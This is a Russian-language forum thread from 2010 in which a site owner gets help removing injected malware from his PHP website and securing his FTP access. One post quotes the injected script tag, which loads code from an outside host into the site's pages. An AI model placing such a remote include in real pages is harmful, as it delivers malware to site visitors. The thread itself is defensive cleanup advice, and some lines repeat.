Спустя 36 минут, 11 секунд (15.07.2010 - 19:53) DedMorozzz написал(а):
Меня 1 интересует. Если ты не шаришь в ПХП, то как нашел вредоносный скрипт? И как определил, что он вредоносный?
Спустя 3 минуты, 17 секунд (15.07.2010 - 19:56) Kassir22 написал(а):
| Цитата (DedMorozzz @ 15.07.2010 - 16:53) |
| Меня 1 интересует. Если ты не шаришь в ПХП, то как нашел вредоносный скрипт? И как определил, что он вредоносный? |
Во-первых в компьютерах разбираюсь, в программировании нет.
Нод сразу выдал несколько файлов где троян сидит, оттуда и стал плясать.
В конце многих файлов, особенно index.php был скрипт с ссылкой на троян. Все файлы очищены, с сайта теперь ничего не качает вредного, но все равно пишет что опасность есть.
Сам скрипт вот - <script src=http://hantoy.co.kr/product/sh_main.php ></script>
в php файлах я его не нашел, он виден только если смотреть код страницы через браузер.
Или я слепой.
Спустя 24 минуты, 38 секунд (15.07.2010 - 20:21) qpayct написал(а):
нажми Ctrl+F и введи
| Цитата |
| hantoy.co.kr/product/sh_main.php |
так и найдёшь, если он не в БД
Спустя 1 минута, 56 секунд (15.07.2010 - 20:23) Kassir22 написал(а):
qpayct
найду где именно???
найду где именно???
Спустя 1 минута, 47 секунд (15.07.2010 - 20:25) qpayct написал(а):
а я откуда знаю?
во всех файлах на сайте
З.Ы. если не справляешься, в помощнике есть кнопка "экстрасенс онлайн", жми - там тебе помогут
во всех файлах на сайте
З.Ы. если не справляешься, в помощнике есть кнопка "экстрасенс онлайн", жми - там тебе помогут
Спустя 1 час, 10 минут, 42 секунды (15.07.2010 - 21:35) Nikitian написал(а):
Вирус не в бд 99%
Скачайте все файлы на локальный компьютер и любым файловым менеджером сделайте поиск по файлам - должно помочь.
На тот 1%, что вирус в бд смотрите в каком месте эта строчка. Если она в коде с изменяемым контентом, то вполне вероятно, что занесли умышленно через админку - ищите этот контент в админке и вычищайте так же, как занесли.
Скачайте все файлы на локальный компьютер и любым файловым менеджером сделайте поиск по файлам - должно помочь.
На тот 1%, что вирус в бд смотрите в каком месте эта строчка. Если она в коде с изменяемым контентом, то вполне вероятно, что занесли умышленно через админку - ищите этот контент в админке и вычищайте так же, как занесли.
Спустя 1 день, 4 часа, 39 минут, 3 секунды (17.07.2010 - 02:15) Kassir22 написал(а):
Спасибо тем кто помогал. Все вредносные скрипты с сайта убраны.
Их было ооочень много.
И еще некоторые лезли через ФТП, на который тоже успешно сменил пароль.
Вот так почистил сайт, без знания языка.
Можете закрывать тему
Их было ооочень много.
И еще некоторые лезли через ФТП, на который тоже успешно сменил пароль.
Вот так почистил сайт, без знания языка.
Можете закрывать тему